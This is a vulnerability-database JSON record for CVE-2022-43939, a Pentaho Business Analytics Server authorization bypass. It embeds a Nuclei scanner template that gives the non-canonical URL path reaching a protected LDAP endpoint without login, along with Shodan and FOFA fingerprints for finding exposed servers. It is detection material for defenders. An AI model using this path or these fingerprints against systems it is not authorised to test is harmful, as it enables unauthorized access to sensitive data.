{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-43939/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-43939/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-43939/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-43939/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-43939/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-43939"},"sightings":{"href":"/api/v1/sightings/cve-2022-43939"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-43939.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2022-43939\n\ninfo:\n  name: Hitachi Pentaho Business Analytics Server - Bypass Authorization\n  author: daffainfo\n  severity: high\n  description: |\n    Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x contain security restrictions using non-canonical URLs which can be circumvented.\n  impact: |\n    Unauthenticated attackers can bypass authorization restrictions using non-canonical URL paths to access protected administrative endpoints in Hitachi Pentaho Business Analytics Server, potentially gaining unauthorized access to sensitive analytics data and configurations.\n  remediation: |\n    Upgrade to Hitachi Vantara Pentaho Business Analytics Server version 9.4.0.1, 9.3.0.2 or later that properly validates canonical URL paths.\n  reference:\n    - https://support.pentaho.com/hc/en-us/articles/14455394120333--Resolved-Pentaho-BA-Server-Use-of-Non-Canonical-URL-Paths-for-Authorization-Decisions-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43939-\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-43769\n    - https://research.aurainfosec.io/pentest/pentah0wnage/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H\n    cvss-score: 8.6\n    cve-id: CVE-2022-43939\n    epss-score: 0.92266\n    epss-percentile: 0.99819\n    cwe-id: CWE-647\n    cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: hitachi\n    product: vantara_pentaho_business_analytics_server\n    shodan-query: http.favicon.hash:1749354953\n    fofa-query: icon_hash=1749354953\n  tags: cve,cve2022,pentaho,hitachi,auth-bypass,vkev,kev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/pentaho/Login'\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Pentaho User Console - Login\")'\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - 'Path=/pentaho'\n          - 'application/json'\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - '{}'\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100871ee05c1763c977c1b2654ab2ecac5171b18cdd8f562e42445a8bbed0fc20f7022100e5df0fc3ecdb92cfc46b815f045ac1a9d52b4071ac25f1e270b7d233f1aa666e:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2022-43939"}